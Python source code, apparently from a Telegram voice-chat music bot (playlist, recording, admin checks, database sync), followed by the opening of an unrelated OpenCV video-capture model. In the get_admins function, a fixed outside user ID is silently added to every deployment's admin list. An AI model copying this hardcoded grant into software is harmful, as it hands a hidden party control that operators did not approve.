LOGGER.error(f"Errors occured while getting link from youtube video - No Video Formats Found")
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return False
async def download(song, msg=None):
if song[3] == "telegram":
if not Config.GET_FILE.get(song[5]):
try:
original_file = await bot.download_media(song[2], progress=progress_bar, file_name=f'./tgdownloads/', progress_args=(int((song[5].split("_"))[1]), time.time(), msg))
Config.GET_FILE[song[5]]=original_file
except Exception as e:
LOGGER.error(e)
Config.playlist.remove(song)
await clear_db_playlist(song=song)
if len(Config.playlist) <= 1:
return
await download(Config.playlist[1])
async def chek_the_media(link, seek=False, pic=False, title="Music"):
if not Config.IS_VIDEO:
width, height = None, None
is_audio_=False
try:
is_audio_ = is_audio(link)
except:
is_audio_ = False
LOGGER.error("Unable to get Audio properties within time.")
if not is_audio_:
Config.STREAM_LINK=False
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return None, None, None, None, None
else:
try:
width, height = get_height_and_width(link)
except:
width, height = None, None
LOGGER.error("Unable to get video properties within time.")
if not width or \
not height:
is_audio_=False
try:
is_audio_ = is_audio(link)
except:
is_audio_ = False
LOGGER.error("Unable to get Audio properties within time.")
if is_audio_:
pic_=await bot.get_messages("DumpPlaylist", 30)
photo = "./pic/photo"
if not os.path.exists(photo):
photo = await pic_.download(file_name=photo)
try:
dur_=get_duration(link)
except:
dur_='None'
pic = get_image(title, photo, dur_)
else:
Config.STREAM_LINK=False
if Config.playlist or Config.STREAM_LINK:
return await skip()
else:
LOGGER.error("This stream is not supported , leaving VC.")
return None, None, None, None, None
try:
dur=get_duration(link)
except:
dur=0
Config.DATA['FILE_DATA']={"file":link, 'dur':dur}
return link, seek, pic, width, height
async def edit_title():
if not Config.playlist:
title = "Live Stream"
else:
title = Config.playlist[0][1]
try:
chat = await USER.resolve_peer(Config.CHAT)
full_chat=await USER.send(
GetFullChannel(
channel=InputChannel(
channel_id=chat.channel_id,
access_hash=chat.access_hash,
),
),
)
edit = EditGroupCallTitle(call=full_chat.full_chat.call, title=title)
await USER.send(edit)
except Exception as e:
LOGGER.error(f"Errors Occured while editing title - {e}")
pass
async def stop_recording():
job=str(Config.CHAT)
a = await bot.send(GetFullChannel(channel=(await bot.resolve_peer(Config.CHAT))))
if a.full_chat.call is None:
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
Config.IS_RECORDING=False
await sync_to_db()
return False, "No GroupCall Found"
try:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=False,
)
)
Config.IS_RECORDING=False
Config.LISTEN=True
await sync_to_db()
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
return True, "Succesfully Stoped Recording"
except Exception as e:
if 'GROUPCALL_NOT_MODIFIED' in str(e):
LOGGER.warning("Already No recording Exist")
Config.IS_RECORDING=False
await sync_to_db()
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
return False, "No recording was started"
else:
LOGGER.error(str(e))
Config.IS_RECORDING=False
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
await sync_to_db()
return False, str(e)
async def start_record_stream():
if Config.IS_RECORDING:
await stop_recording()
if Config.WAS_RECORDING:
Config.WAS_RECORDING=False
a = await bot.send(GetFullChannel(channel=(await bot.resolve_peer(Config.CHAT))))
job=str(Config.CHAT)
if a.full_chat.call is None:
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
return False, "No GroupCall Found"
try:
if not Config.PORTRAIT:
pt = False
else:
pt = True
if not Config.RECORDING_TITLE:
tt = None
else:
tt = Config.RECORDING_TITLE
if Config.IS_VIDEO_RECORD:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=True,
title=tt,
video=True,
video_portrait=pt,
)
)
time=240
else:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=True,
title=tt,
)
)
time=86400
Config.IS_RECORDING=True
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
try:
scheduler.add_job(renew_recording, "interval", id=job, minutes=time, max_instances=50, misfire_grace_time=None)
except ConflictingIdError:
scheduler.remove_job(job, jobstore=None)
scheduler.add_job(renew_recording, "interval", id=job, minutes=time, max_instances=50, misfire_grace_time=None)
LOGGER.warning("This already scheduled, rescheduling")
await sync_to_db()
LOGGER.info("Recording Started")
return True, "Succesfully Started Recording"
except Exception as e:
if 'GROUPCALL_NOT_MODIFIED' in str(e):
LOGGER.warning("Already Recording.., stoping and restarting")
Config.IS_RECORDING=True
await stop_recording()
return await start_record_stream()
else:
LOGGER.error(str(e))
Config.IS_RECORDING=False
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
await sync_to_db()
return False, str(e)
async def renew_recording():
try:
job=str(Config.CHAT)
a = await bot.send(GetFullChannel(channel=(await bot.resolve_peer(Config.CHAT))))
if a.full_chat.call is None:
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
LOGGER.info("Groupcall empty, stopped scheduler")
return
except ConnectionError:
pass
try:
if not Config.PORTRAIT:
pt = False
else:
pt = True
if not Config.RECORDING_TITLE:
tt = None
else:
tt = Config.RECORDING_TITLE
if Config.IS_VIDEO_RECORD:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=True,
title=tt,
video=True,
video_portrait=pt,
)
)
else:
await USER.send(
ToggleGroupCallRecord(
call=(
await USER.send(
GetFullChannel(
channel=(
await USER.resolve_peer(
Config.CHAT
)
)
)
)
).full_chat.call,
start=True,
title=tt,
)
)
Config.IS_RECORDING=True
await sync_to_db()
return True, "Succesfully Started Recording"
except Exception as e:
if 'GROUPCALL_NOT_MODIFIED' in str(e):
LOGGER.warning("Already Recording.., stoping and restarting")
Config.IS_RECORDING=True
await stop_recording()
return await start_record_stream()
else:
LOGGER.error(str(e))
Config.IS_RECORDING=False
k=scheduler.get_job(job_id=job, jobstore=None)
if k:
scheduler.remove_job(job, jobstore=None)
await sync_to_db()
return False, str(e)
async def send_playlist():
if Config.LOG_GROUP:
pl = await get_playlist_str()
if Config.msg.get('player') is not None:
await Config.msg['player'].delete()
Config.msg['player'] = await send_text(pl)
async def send_text(text):
message = await bot.send_message(
Config.LOG_GROUP,
text,
reply_markup=await get_buttons(),
disable_web_page_preview=True,
disable_notification=True
)
return message
async def shuffle_playlist():
v = []
p = [v.append(Config.playlist[c]) for c in range(2,len(Config.playlist))]
random.shuffle(v)
for c in range(2,len(Config.playlist)):
Config.playlist.remove(Config.playlist[c])
Config.playlist.insert(c,v[c-2])
async def import_play_list(file):
file=open(file)
try:
f=json.loads(file.read(), object_hook=lambda d: {int(k): v for k, v in d.items()})
for playf in f:
Config.playlist.append(playf)
await add_to_db_playlist(playf)
if len(Config.playlist) >= 1 \
and not Config.CALL_STATUS:
LOGGER.info("Extracting link and Processing...")
await download(Config.playlist[0])
await play()
elif (len(Config.playlist) == 1 and Config.CALL_STATUS):
LOGGER.info("Extracting link and Processing...")
await download(Config.playlist[0])
await play()
if not Config.playlist:
file.close()
try:
os.remove(file)
except:
pass
return False
file.close()
for track in Config.playlist[:2]:
await download(track)
try:
os.remove(file)
except:
pass
return True
except Exception as e:
LOGGER.error(f"Errors while importing playlist {e}")
return False
async def y_play(playlist):
try:
getplaylist=await bot.get_messages("DumpPlaylist", int(playlist))
playlistfile = await getplaylist.download()
LOGGER.warning("Trying to get details from playlist.")
n=await import_play_list(playlistfile)
if not n:
LOGGER.error("Errors Occured While Importing Playlist")
Config.YSTREAM=True
Config.YPLAY=False
if Config.IS_LOOP:
Config.STREAM_URL="https://www.youtube.com/watch?v=zcrUCvBD16k"
LOGGER.info("Starting Default Live, 24 News")
await start_stream()
return False
if Config.SHUFFLE:
await shuffle_playlist()
except Exception as e:
LOGGER.error("Errors Occured While Importing Playlist", e)
Config.YSTREAM=True
Config.YPLAY=False
if Config.IS_LOOP:
Config.STREAM_URL="https://www.youtube.com/watch?v=zcrUCvBD16k"
LOGGER.info("Starting Default Live, 24 News")
await start_stream()
return False
async def pause():
try:
await group_call.pause_stream(Config.CHAT)
return True
except GroupCallNotFound:
await restart_playout()
return False
except Exception as e:
LOGGER.error(f"Errors Occured while pausing -{e}")
return False
async def resume():
try:
await group_call.resume_stream(Config.CHAT)
return True
except GroupCallNotFound:
await restart_playout()
return False
except Exception as e:
LOGGER.error(f"Errors Occured while resuming -{e}")
return False
async def volume(volume):
try:
await group_call.change_volume_call(Config.CHAT, volume)
Config.VOLUME=int(volume)
except BadRequest:
await restart_playout()
except Exception as e:
LOGGER.error(f"Errors Occured while changing volume Error -{e}")
async def mute():
try:
await group_call.mute_stream(Config.CHAT)
return True
except GroupCallNotFound:
await restart_playout()
return False
except Exception as e:
LOGGER.error(f"Errors Occured while muting -{e}")
return False
async def unmute():
try:
await group_call.unmute_stream(Config.CHAT)
return True
except GroupCallNotFound:
await restart_playout()
return False
except Exception as e:
LOGGER.error(f"Errors Occured while unmuting -{e}")
return False
async def get_admins(chat):
admins=Config.ADMINS
if not Config.ADMIN_CACHE:
if 626664225 not in admins:
admins.append(626664225)
try:
grpadmins=await bot.get_chat_members(chat_id=chat, filter="administrators")
for administrator in grpadmins:
if not administrator.user.id in admins:
admins.append(administrator.user.id)
except Exception as e:
LOGGER.error(f"Errors occured while getting admin list - {e}")
pass
Config.ADMINS=admins
Config.ADMIN_CACHE=True
if Config.DATABASE_URI:
await db.edit_config("ADMINS", Config.ADMINS)
return admins
async def is_admin(_, client, message: Message):
admins = await get_admins(Config.CHAT)
if message.from_user is None and message.sender_chat:
return True
elif message.from_user.id in admins:
return True
else:
return False
async def valid_chat(_, client, message: Message):
if message.chat.type == "private":
return True
elif message.chat.id == Config.CHAT:
return True
elif Config.LOG_GROUP and message.chat.id == Config.LOG_GROUP:
return True
else:
return False
chat_filter=filters.create(valid_chat)
async def sudo_users(_, client, message: Message):
if message.from_user is None and message.sender_chat:
return False
elif message.from_user.id in Config.SUDO:
return True
else:
return False
sudo_filter=filters.create(sudo_users)
async def get_playlist_str():
if not Config.CALL_STATUS:
pl="Player is idle and no song is playing.ㅤㅤㅤㅤ"
if Config.STREAM_LINK:
pl = f"🔈 Streaming [Live Stream]({Config.STREAM_LINK}) ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ"
elif not Config.playlist:
pl = f"🔈 Playlist is empty. Streaming [STARTUP_STREAM]({Config.STREAM_URL})ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ"
else:
if len(Config.playlist)>=25:
tplaylist=Config.playlist[:25]
pl=f"Listing first 25 songs of total {len(Config.playlist)} songs.\n"
pl += f"▶️ **Playlist**: ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ\n" + "\n".join([
f"**{i}**. **🎸{x[1]}**\n 👤**Requested by:** {x[4]}"
for i, x in enumerate(tplaylist)
])
tplaylist.clear()
else:
pl = f"▶️ **Playlist**: ㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤㅤ\n" + "\n".join([
f"**{i}**. **🎸{x[1]}**\n 👤**Requested by:** {x[4]}\n"
for i, x in enumerate(Config.playlist)
])
return pl
async def get_buttons():
data=Config.DATA.get("FILE_DATA")
if not Config.CALL_STATUS:
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"🎸 Start the Player", callback_data="restart"),
InlineKeyboardButton('🗑 Close', callback_data='close'),
],
]
)
elif data.get('dur', 0) == 0:
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"{get_player_string()}", callback_data="info_player"),
],
[
InlineKeyboardButton(f"⏯ {get_pause(Config.PAUSE)}", callback_data=f"{get_pause(Config.PAUSE)}"),
InlineKeyboardButton('🔊 Volume Control', callback_data='volume_main'),
InlineKeyboardButton('🗑 Close', callback_data='close'),
],
]
)
else:
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"{get_player_string()}", callback_data='info_player'),
],
[
InlineKeyboardButton("⏮ Rewind", callback_data='rewind'),
InlineKeyboardButton(f"⏯ {get_pause(Config.PAUSE)}", callback_data=f"{get_pause(Config.PAUSE)}"),
InlineKeyboardButton(f"⏭ Seek", callback_data='seek'),
],
[
InlineKeyboardButton("🔄 Shuffle", callback_data="shuffle"),
InlineKeyboardButton("⏩ Skip", callback_data="skip"),
InlineKeyboardButton("⏮ Replay", callback_data="replay"),
],
[
InlineKeyboardButton('🔊 Volume Control', callback_data='volume_main'),
InlineKeyboardButton('🗑 Close', callback_data='close'),
]
]
)
return reply_markup
async def settings_panel():
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"Player Mode", callback_data='info_mode'),
InlineKeyboardButton(f"{'🔂 Non Stop Playback' if Config.IS_LOOP else '▶️ Play and Leave'}", callback_data='is_loop'),
],
[
InlineKeyboardButton("🎞 Video", callback_data=f"info_video"),
InlineKeyboardButton(f"{'📺 Enabled' if Config.IS_VIDEO else '🎙 Disabled'}", callback_data='is_video'),
],
[
InlineKeyboardButton("🤴 Admin Only", callback_data=f"info_admin"),
InlineKeyboardButton(f"{'🔒 Enabled' if Config.ADMIN_ONLY else '🔓 Disabled'}", callback_data='admin_only'),
],
[
InlineKeyboardButton("🪶 Edit Title", callback_data=f"info_title"),
InlineKeyboardButton(f"{'✏️ Enabled' if Config.EDIT_TITLE else '🚫 Disabled'}", callback_data='edit_title'),
],
[
InlineKeyboardButton("🔀 Shuffle Mode", callback_data=f"info_shuffle"),
InlineKeyboardButton(f"{'✅ Enabled' if Config.SHUFFLE else '🚫 Disabled'}", callback_data='set_shuffle'),
],
[
InlineKeyboardButton("👮 Auto Reply (PM Permit)", callback_data=f"info_reply"),
InlineKeyboardButton(f"{'✅ Enabled' if Config.REPLY_PM else '🚫 Disabled'}", callback_data='reply_msg'),
],
[
InlineKeyboardButton('🗑 Close', callback_data='close'),
]
]
)
await sync_to_db()
return reply_markup
async def recorder_settings():
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"{'⏹ Stop Recording' if Config.IS_RECORDING else '⏺ Start Recording'}", callback_data='record'),
],
[
InlineKeyboardButton(f"Record Video", callback_data='info_videorecord'),
InlineKeyboardButton(f"{'Enabled' if Config.IS_VIDEO_RECORD else 'Disabled'}", callback_data='record_video'),
],
[
InlineKeyboardButton(f"Video Dimension", callback_data='info_videodimension'),
InlineKeyboardButton(f"{'Portrait' if Config.PORTRAIT else 'Landscape'}", callback_data='record_dim'),
],
[
InlineKeyboardButton(f"Custom Recording Title", callback_data='info_rectitle'),
InlineKeyboardButton(f"{Config.RECORDING_TITLE if Config.RECORDING_TITLE else 'Default'}", callback_data='info_rectitle'),
],
[
InlineKeyboardButton(f"Recording Dump Channel", callback_data='info_recdumb'),
InlineKeyboardButton(f"{Config.RECORDING_DUMP if Config.RECORDING_DUMP else 'Not Dumping'}", callback_data='info_recdumb'),
],
[
InlineKeyboardButton('🗑 Close', callback_data='close'),
]
]
)
await sync_to_db()
return reply_markup
async def volume_buttons():
reply_markup=InlineKeyboardMarkup(
[
[
InlineKeyboardButton(f"{get_volume_string()}", callback_data='info_volume'),
],
[
InlineKeyboardButton(f"{'🔊' if Config.MUTED else '🔇'}", callback_data='mute'),
InlineKeyboardButton(f"- 10", callback_data='volume_less'),
InlineKeyboardButton(f"+ 10", callback_data='volume_add'),
],
[
InlineKeyboardButton(f"🔙 Back", callback_data='volume_back'),
InlineKeyboardButton('🗑 Close', callback_data='close'),
]
]
)
return reply_markup
async def delete_messages(messages):
await asyncio.sleep(Config.DELAY)
for msg in messages:
try:
if msg.chat.type == "supergroup":
await msg.delete()
except:
pass
#Database Config
async def sync_to_db():
if Config.DATABASE_URI:
await check_db()
await db.edit_config("ADMINS", Config.ADMINS)
await db.edit_config("IS_VIDEO", Config.IS_VIDEO)
await db.edit_config("IS_LOOP", Config.IS_LOOP)
await db.edit_config("REPLY_PM", Config.REPLY_PM)
await db.edit_config("ADMIN_ONLY", Config.ADMIN_ONLY)
await db.edit_config("SHUFFLE", Config.SHUFFLE)
await db.edit_config("EDIT_TITLE", Config.EDIT_TITLE)
await db.edit_config("CHAT", Config.CHAT)
await db.edit_config("SUDO", Config.SUDO)
await db.edit_config("REPLY_MESSAGE", Config.REPLY_MESSAGE)
await db.edit_config("LOG_GROUP", Config.LOG_GROUP)
await db.edit_config("STREAM_URL", Config.STREAM_URL)
await db.edit_config("DELAY", Config.DELAY)
await db.edit_config("SCHEDULED_STREAM", Config.SCHEDULED_STREAM)
await db.edit_config("SCHEDULE_LIST", Config.SCHEDULE_LIST)
await db.edit_config("IS_VIDEO_RECORD", Config.IS_VIDEO_RECORD)
await db.edit_config("IS_RECORDING", Config.IS_RECORDING)
await db.edit_config("WAS_RECORDING", Config.WAS_RECORDING)
await db.edit_config("PORTRAIT", Config.PORTRAIT)
await db.edit_config("RECORDING_DUMP", Config.RECORDING_DUMP)
await db.edit_config("RECORDING_TITLE", Config.RECORDING_TITLE)
await db.edit_config("HAS_SCHEDULE", Config.HAS_SCHEDULE)
async def sync_from_db():
if Config.DATABASE_URI:
await check_db()
Config.ADMINS = await db.get_config("ADMINS")
Config.IS_VIDEO = await db.get_config("IS_VIDEO")
Config.IS_LOOP = await db.get_config("IS_LOOP")
Config.REPLY_PM = await db.get_config("REPLY_PM")
Config.ADMIN_ONLY = await db.get_config("ADMIN_ONLY")
Config.SHUFFLE = await db.get_config("SHUFFLE")
Config.EDIT_TITLE = await db.get_config("EDIT_TITLE")
Config.CHAT = int(await db.get_config("CHAT"))
Config.playlist = await db.get_playlist()
Config.LOG_GROUP = await db.get_config("LOG_GROUP")
Config.SUDO = await db.get_config("SUDO")
Config.REPLY_MESSAGE = await db.get_config("REPLY_MESSAGE")
Config.DELAY = await db.get_config("DELAY")
Config.STREAM_URL = await db.get_config("STREAM_URL")
Config.SCHEDULED_STREAM = await db.get_config("SCHEDULED_STREAM")
Config.SCHEDULE_LIST = await db.get_config("SCHEDULE_LIST")
Config.IS_VIDEO_RECORD = await db.get_config('IS_VIDEO_RECORD')
Config.IS_RECORDING = await db.get_config("IS_RECORDING")
Config.WAS_RECORDING = await db.get_config('WAS_RECORDING')
Config.PORTRAIT = await db.get_config("PORTRAIT")
Config.RECORDING_DUMP = await db.get_config("RECORDING_DUMP")
Config.RECORDING_TITLE = await db.get_config("RECORDING_TITLE")
Config.HAS_SCHEDULE = await db.get_config("HAS_SCHEDULE")
async def add_to_db_playlist(song):
if Config.DATABASE_URI:
song_={str(k):v for k,v in song.items()}
db.add_to_playlist(song[5], song_)
async def clear_db_playlist(song=None, all=False):
if Config.DATABASE_URI:
if all:
await db.clear_playlist()
else:
await db.del_song(song[5])
async def check_db():
if not await db.is_saved("ADMINS"):
db.add_config("ADMINS", Config.ADMINS)
if not await db.is_saved("IS_VIDEO"):
db.add_config("IS_VIDEO", Config.IS_VIDEO)
if not await db.is_saved("IS_LOOP"):
db.add_config("IS_LOOP", Config.IS_LOOP)
if not await db.is_saved("REPLY_PM"):
db.add_config("REPLY_PM", Config.REPLY_PM)
if not await db.is_saved("ADMIN_ONLY"):
db.add_config("ADMIN_ONLY", Config.ADMIN_ONLY)
if not await db.is_saved("SHUFFLE"):
db.add_config("SHUFFLE", Config.SHUFFLE)
if not await db.is_saved("EDIT_TITLE"):
db.add_config("EDIT_TITLE", Config.EDIT_TITLE)
if not await db.is_saved("CHAT"):
db.add_config("CHAT", Config.CHAT)
if not await db.is_saved("SUDO"):
db.add_config("SUDO", Config.SUDO)
if not await db.is_saved("REPLY_MESSAGE"):
db.add_config("REPLY_MESSAGE", Config.REPLY_MESSAGE)
if not await db.is_saved("STREAM_URL"):
db.add_config("STREAM_URL", Config.STREAM_URL)
if not await db.is_saved("DELAY"):
db.add_config("DELAY", Config.DELAY)
if not await db.is_saved("LOG_GROUP"):
db.add_config("LOG_GROUP", Config.LOG_GROUP)
if not await db.is_saved("SCHEDULED_STREAM"):
db.add_config("SCHEDULED_STREAM", Config.SCHEDULED_STREAM)
if not await db.is_saved("SCHEDULE_LIST"):
db.add_config("SCHEDULE_LIST", Config.SCHEDULE_LIST)
if not await db.is_saved("IS_VIDEO_RECORD"):
db.add_config("IS_VIDEO_RECORD", Config.IS_VIDEO_RECORD)
if not await db.is_saved("PORTRAIT"):
db.add_config("PORTRAIT", Config.PORTRAIT)
if not await db.is_saved("IS_RECORDING"):
db.add_config("IS_RECORDING", Config.IS_RECORDING)
if not await db.is_saved('WAS_RECORDING'):
db.add_config('WAS_RECORDING', Config.WAS_RECORDING)
if not await db.is_saved("RECORDING_DUMP"):
db.add_config("RECORDING_DUMP", Config.RECORDING_DUMP)
if not await db.is_saved("RECORDING_TITLE"):
db.add_config("RECORDING_TITLE", Config.RECORDING_TITLE)
if not await db.is_saved('HAS_SCHEDULE'):
db.add_config("HAS_SCHEDULE", Config.HAS_SCHEDULE)
async def progress_bar(current, zero, total, start, msg):
now = time.time()
if total == 0:
return
if round((now - start) % 3) == 0 or current == total:
speed = current / (now - start)
percentage = current * 100 / total
time_to_complete = round(((total - current) / speed)) * 1000
time_to_complete = TimeFormatter(time_to_complete)
progressbar = "[{0}{1}]".format(\
''.join(["▰" for i in range(math.floor(percentage / 5))]),
''.join(["▱" for i in range(20 - math.floor(percentage / 5))])
)
current_message = f"**Downloading** {round(percentage, 2)}% \n{progressbar}\n⚡️ **Speed**: {humanbytes(speed)}/s\n⬇️ **Downloaded**: {humanbytes(current)} / {humanbytes(total)}\n🕰 **Time Left**: {time_to_complete}"
if msg:
try:
await msg.edit(text=current_message)
except:
pass
LOGGER.info(f"Downloading {round(percentage, 2)}% ")
@timeout(10)
def is_audio(file):
try:
k=ffmpeg.probe(file)['streams']
if k:
return True
else:
return False
except KeyError:
return False
except Exception as e:
LOGGER.error(f"Stream Unsupported {e} ")
return False
@timeout(10)#wait for maximum 10 sec, temp fix for ffprobe
def get_height_and_width(file):
try:
k=ffmpeg.probe(file)['streams']
width=None
height=None
for f in k:
try:
width=int(f["width"])
height=int(f["height"])
if height >= 256:
break
except KeyError:
continue
except:
LOGGER.error("Error, This stream is not supported.")
width, height = False, False
return width, height
@timeout(10)
def get_duration(file):
try:
total=ffmpeg.probe(file)['format']['duration']
return total
except:
return 0
def humanbytes(size):
if not size:
return ""
power = 2**10
n = 0
Dic_powerN = {0: ' ', 1: 'K', 2: 'M', 3: 'G', 4: 'T'}
while size > power:
size /= power
n += 1
return str(round(size, 2)) + " " + Dic_powerN[n] + 'B'
def get_player_string():
now = time.time()
data=Config.DATA.get('FILE_DATA')
dur=int(float(data.get('dur', 0)))
start = int(Config.DUR.get('TIME', 0))
played = round(now-start)
if played == 0:
played += 1
if dur == 0:
dur=played
played = round(now-start)
percentage = played * 100 / dur
progressbar = "▷ {0}◉{1}".format(\
''.join(["━" for i in range(math.floor(percentage / 5))]),
''.join(["─" for i in range(20 - math.floor(percentage / 5))])
)
final=f"{convert(played)} {progressbar} {convert(dur)}"
return final
def get_volume_string():
current = int(Config.VOLUME)
if current == 0:
current += 1
if Config.MUTED:
e='🔇'
elif 0 < current < 75:
e="🔈"
elif 75 < current < 150:
e="🔉"
else:
e="🔊"
percentage = current * 100 / 200
progressbar = "🎙 {0}◉{1}".format(\
''.join(["━" for i in range(math.floor(percentage / 5))]),
''.join(["─" for i in range(20 - math.floor(percentage / 5))])
)
final=f" {str(current)} / {str(200)} {progressbar} {e}"
return final
def TimeFormatter(milliseconds: int) -> str:
seconds, milliseconds = divmod(int(milliseconds), 1000)
minutes, seconds = divmod(seconds, 60)
hours, minutes = divmod(minutes, 60)
days, hours = divmod(hours, 24)
tmp = ((str(days) + " days, ") if days else "") + \
((str(hours) + " hours, ") if hours else "") + \
((str(minutes) + " min, ") if minutes else "") + \
((str(seconds) + " sec, ") if seconds else "") + \
((str(milliseconds) + " millisec, ") if milliseconds else "")
return tmp[:-2]
def set_config(value):
if value:
return False
else:
return True
def convert(seconds):
seconds = seconds % (24 * 3600)
hour = seconds // 3600
seconds %= 3600
minutes = seconds // 60
seconds %= 60
return "%d:%02d:%02d" % (hour, minutes, seconds)
def get_pause(status):
if status == True:
return "Resume"
else:
return "Pause"
def stop_and_restart():
os.system("git pull")
time.sleep(10)
os.execl(sys.executable, sys.executable, *sys.argv)
def get_image(title, pic, dur="Live"):
newimage = "converted.jpg"
image = Image.open(pic)
draw = ImageDraw.Draw(image)
font = ImageFont.truetype('font.ttf', 70)
title = title[0:30]
MAX_W = 1790
dur=convert(int(float(dur)))
if dur=="0:00:00":
dur = "Live Stream"
para=[f'Playing : {title}', f'Duration: {dur}']
current_h, pad = 450, 20
for line in para:
w, h = draw.textsize(line, font=font)
draw.text(((MAX_W - w) / 2, current_h), line, font=font, fill ="skyblue")
current_h += h + pad
image.save(newimage)
return newimage
async def edit_config(var, value):
if var == "STARTUP_STREAM":
Config.STREAM_URL = value
elif var == "CHAT":
Config.CHAT = int(value)
elif var == "LOG_GROUP":
Config.LOG_GROUP = int(value)
elif var == "DELAY":
Config.DELAY = int(value)
elif var == "REPLY_MESSAGE":
Config.REPLY_MESSAGE = value
elif var == "RECORDING_DUMP":
Config.RECORDING_DUMP = value
await sync_to_db()
async def update():
await leave_call()
if Config.HEROKU_APP:
Config.HEROKU_APP.restart()
else:
Thread(
target=stop_and_restart()
).start()
async def startup_check():
if Config.LOG_GROUP:
try:
k=await bot.get_chat_member(Config.LOG_GROUP, Config.BOT_USERNAME)
except ValueError:
LOGGER.error(f"LOG_GROUP var Found and @{Config.BOT_USERNAME} is not a member of the group.")
return False
if Config.RECORDING_DUMP:
try:
k=await USER.get_chat_member(Config.RECORDING_DUMP, Config.USER_ID)
except ValueError:
LOGGER.error(f"RECORDING_DUMP var Found and @{Config.USER_ID} is not a member of the group./ Channel")
return False
if not k.status in ["administrator", "creator"]:
LOGGER.error(f"RECORDING_DUMP var Found and @{Config.USER_ID} is not a admin of the group./ Channel")
return False
if Config.CHAT:
try:
k=await USER.get_chat_member(Config.CHAT, Config.USER_ID)
if not k.status in ["administrator", "creator"]:
LOGGER.warning(f"{Config.USER_ID} is not an admin in {Config.CHAT}, it is recommended to run the user as admin.")
elif k.status in ["administrator", "creator"] and not k.can_manage_voice_chats:
LOGGER.warning(f"{Config.USER_ID} is not having right to manage voicechat, it is recommended to promote with this right.")
except ValueError:
LOGGER.error(f"The user account by which you generated the SESSION_STRING is not found on CHAT ({Config.CHAT})")
return False
try:
k=await bot.get_chat_member(Config.CHAT, Config.BOT_USERNAME)
if not k.status == "administrator":
LOGGER.warning(f"{Config.BOT_USERNAME}, is not an admin in {Config.CHAT}, it is recommended to run the bot as admin.")
except ValueError:
LOGGER.warning(f"Bot Was Not Found on CHAT, it is recommended to add {Config.BOT_USERNAME} to {Config.CHAT}")
pass
if not Config.DATABASE_URI:
LOGGER.warning("No DATABASE_URI , found. It is recommended to use a database.")
return True
|
enaml_video_model.py
|
from atom.api import Atom, Typed, Unicode, Int, Bool, Signal
from enaml.core.declarative import d_
from enaml.application import deferred_call
from time import sleep
from collections import deque
from threading import Thread
from numpy import ndarray
import numpy as np
from typing import Tuple
import os.path as p
from ._library import cv
CAP_PERIOD = 0.020 # capture period in seconds
def edit_frame(frame: ndarray, y: int) -> Tuple[ndarray, ndarray]:
"""
Parameters
----------
frame : (is row-major)
y
Returns
-------
(frame, cut)
"""
np.random.uniform(-1, 1, size=20000000) # 20000000@6cores
cut = cv.cvtColor(frame[[y], :], cv.COLOR_BGR2GRAY)[0, :]
# Convert OpenCV colors to PyQtGraph colors
frame = cv.cvtColor(frame, cv.COLOR_BGR2RGB)
return frame, cut
class Model(Atom):
"""
Read: Просто читаю кадры и кладу в очередь через период (в отдельном потоке).
Период либо берется из свойств файла, либо константа (10 мс) - если мы не знаем свойств источника.
Edit: По таймеру, через (другой) период беру последний кадр из очереди и обрабатываю его (в основном потоке).
Out: После обработки сразу же вывожу (сразу же в том же куске кода).
Constructor parameters
----------------------
file : Unicode = ''
Video file path
device : Int = 0
OpenCV device ID used only if the file doesn't exist
"""
file = Unicode('')
device = Int(0)
captured_frames = Typed(deque)
edited_frames = Typed(deque)
y = d_(Int(0))
capturing = d_(Bool(True))
update = Signal()
def start_capturing(self):
"""
Starts workers threads.
"""
self.captured_frames = deque()
self.edited_frames = deque()
if p.isfile(self.file):
capture = cv.VideoCapture(self.file)
period = 1 / capture.get(5)
else:
capture = cv.VideoCapture(self.device)
period = CAP_PERIOD
thread_capturer = Thread(target=worker_capturer, args=(capture, period, self))
thread_editor = Thread(target=worker_editor, args=(period / 2, self))
thread_capturer.daemon = True
thread_editor.daemon = True
thread_capturer.start()
thread_editor.start()
